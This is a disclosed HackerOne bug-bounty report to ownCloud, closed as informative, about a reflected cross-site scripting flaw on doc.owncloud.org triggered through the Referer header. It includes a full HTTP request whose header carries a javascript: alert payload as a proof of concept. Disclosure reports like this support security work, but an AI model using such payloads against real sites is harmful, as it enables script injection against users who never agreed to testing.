doc.owncloud.org: XSS via Referrer

Disclosed: 2016-04-15 09:20:08 By sandh0t To owncloud
Unknown
Vulnerability Details
Hi, The Referer Header in the following request, can be used to trigger an XSS. GET /promote/ HTTP/1.1 Host: doc.owncloud.org User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 Referer: javascript:alert('XSS'); Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Content-Length: 2 The Referrer Value is reflected in the page (in the "referring page" link) see the PoC, however the XSS is not trigger until the victim click in the link.
Actions
View on HackerOne
Report Stats
  • Report ID: 130951
  • State: Closed
  • Substate: informative
  • Upvotes: 3
Share this report